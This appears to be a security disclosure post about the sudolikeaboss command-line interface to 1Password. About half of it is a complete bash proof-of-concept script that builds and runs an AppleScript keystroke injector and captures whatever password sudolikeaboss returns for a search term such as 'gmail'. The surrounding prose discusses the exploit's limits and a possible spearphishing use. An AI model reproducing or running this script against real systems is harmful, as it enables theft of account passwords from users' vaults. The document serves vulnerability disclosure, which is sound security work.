sudolikeaboss is a neat little program that acts as a command-line interface to
1Password Pro, effectively giving you a way to use 1password with the terminal.
This is useful but it does come with a security tradeoff as any application
running in the context of the user can potentially steal passwords if 1password
is in an unlocked state.
This isn't so much of an issue in the official browser extension as there's no
way for a malicious website to invoke applescript or execute arbitrary code.
I don't want to overstate this as it's a fairly limited exploit - it only works
if 1password is unlocked and the screen isn't locked, meaning the user will
almost certainly be aware that it's happened. Also it requires the attacker to
be able to execute code on the machine in the first place, but a user tricked
into running such a malicious application could potentially have multiple
account passwords stolen. A carefully orchestrated spearphishing attack could
combine this with automated password changes to lock the victim out of their
accounts.
The exploit below demonstrates how sudolikeaboss can be abused using AppleScript
to steal the first result of a quick search for a string within 1password. Use
a parameter like "gmail" or "twitter" to see how quickly it can steal your
passwords.
https://m4.rkw.sh/sudolikeyoureowned.sh.txt
-------------------------------------------
#!/bin/bash
####################################################
# sudolikeaboss 0.3.0-beta1 password theft exploit #
####################################################
# by m4rkw, shouts to #coolkids :P #
####################################################
# sudolikeaboss is very convenient but convenience is often a tradeoff
# for security. This PoC demonstrates password theft when 1password
# is in an unlocked state.
#
# The parameter will be used to search 1password and return the first
# matching result. A good choice would be "twitter" or "gmail".
if [ "$1" == "" ] ; then
echo "Usage: $0 <1password search string>"
exit 0
fi
cat > sudo_as.txt <<EOF
delay 0.3
tell application "System Events"
EOF
echo "$1" | fold -w1 |sed 's/^/ keystroke "/g' |sed 's/$/"/g' >> sudo_as.txt
cat >> sudo_as.txt <<EOF
delay 0.5
key code 36
end tell
EOF
osacompile -o sudo_as.scpt sudo_as.txt
osascript "./sudo_as.scpt" &
pass=`sudolikeaboss`
echo "Password stolen: $pass"
